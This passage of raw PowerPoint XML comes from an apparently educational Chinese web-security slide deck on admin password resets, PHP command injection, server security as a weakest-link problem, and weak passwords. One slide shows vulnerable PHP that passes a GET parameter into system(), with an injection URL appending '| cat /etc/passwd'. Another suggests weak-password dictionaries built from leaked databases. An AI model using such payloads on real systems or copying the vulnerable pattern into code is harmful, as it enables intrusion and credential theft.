            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>值为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的管理员账号，并通过表单提交的方式直接修改该管理员的密码，进而使用修改后的密码直接登录管理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>后台</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55299" name="Picture 3" descr="0016"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="899592" y="1630938"/>
            <a:ext cx="7056438" cy="4983099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55301"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修改任意管理员密码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" pitchFamily="3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07</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="41300">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371"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命令注入</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836613"/>
            <a:ext cx="7272338" cy="2062103"/>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本文主要介绍针对</a:t>
            </a:r>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网站常见的攻击方式中的命令攻击。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Command Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>，即命令注入攻击，是指这样一种攻击手段，黑客通过把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>代码输入一个输入机制</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例如缺乏有效验证限制的表格域</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来改变网页的动态生成的内容。使用系统命令是一项危险的操作，尤其在你试图使用远程数据来构造要执行的命令时更是如此。如果使用了被污染数据，命令注入漏洞就产生了。</a:t>
            </a:r>
          </a:p>
          <a:p>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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中可以使用下列</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>个函数来执行外部的应用程序或函数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>system</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exec</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passthru</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shell_exec (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shell_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>功能相同</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57347" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="260350"/>
            <a:ext cx="15303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Php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>命令注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57348" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1939856" y="2996952"/>
            <a:ext cx="4472125" cy="3338596"/>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9750" y="981075"/>
            <a:ext cx="7561263" cy="3293209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>函数漏洞代码：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>$dir = $_GET["dir"]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>if (isset($dir)) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>{ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>   system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>("ls -al ".$dir); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>?&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>我们提交</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" u="sng">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.sectop.com/ex1.php?dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>=| cat /etc/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>提交以后，命令变成了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>system("ls -al | cat /etc/passwd");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43013" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="260350"/>
            <a:ext cx="15303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Php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>命令注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑"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5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="1196975"/>
            <a:ext cx="7921252" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>一只木桶能装多少水，不是最高的那块木板决定的，而是最低的那块木板。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11266" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="260350"/>
            <a:ext cx="1098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木桶原理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11268" name="Picture 4" descr="24114524a98cd92fe19094b11f659717a53706bd"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5580112" y="2768761"/>
            <a:ext cx="3175000" cy="3175000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611188" y="1973443"/>
            <a:ext cx="4572000" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    木桶</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>原理对于服务器安全再适合不过了。基本的注入、上传、遍历、信息泄露、弱口令、病毒邮件等的一种或者几种，往往能够起到“千里之堤毁于蚁穴”的效果。在我们所做的为数众多的入侵检测案例中，入侵者能够进入内网，并在内网里面自由穿行，往往起始于外网的小小漏洞。基于木桶原理，在每一次检测中我们都希望做到尽善尽美，把所有入侵者可能利用的点尽量详细地找出来，以补上最短的那块板。很多时候我们测试一个目标的安全性，也不只局限于这个目标本身WEB的安全状况。还会连同测试他的维护商，开发商的安全性。维护商，开发商往往也会存放服务器的敏感信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24114524a98cd92fe19094b11f659717a53706bd"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="684213" y="1557338"/>
            <a:ext cx="6048375" cy="4032250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60419" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="260350"/>
            <a:ext cx="1530350" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>命令注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60420" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="981075"/>
            <a:ext cx="7561263" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>执行命令读取服务器账户</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08</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="41300">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70659"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弱口令</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39750" y="1148546"/>
            <a:ext cx="8208714" cy="5016758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    在当今很多地方以用户名和口令作为鉴权的世界，口令的重要性就可想 而知了。口令就相当于进入家门的钥匙，当他人有一把可以进入你家的钥匙，想想你的安全、你的财物、你的隐私</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害怕了吧。因为弱口令很容易被他人猜到或破 解，所以如果你使用弱口令，就像把家门钥匙放在家门口的垫子下面，是非常危险的。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>弱口令的危害极大，我们不能不重视。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>随着网上越来越多的数据库被曝光出来，亲，可能你的密码也在里面哦！</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>当然如果从这些数以亿计的库里面提取使用最多的密码作为弱口令字典，那概率是不是很高呢</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRP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各种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>弱口令、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>VPN</a:t>
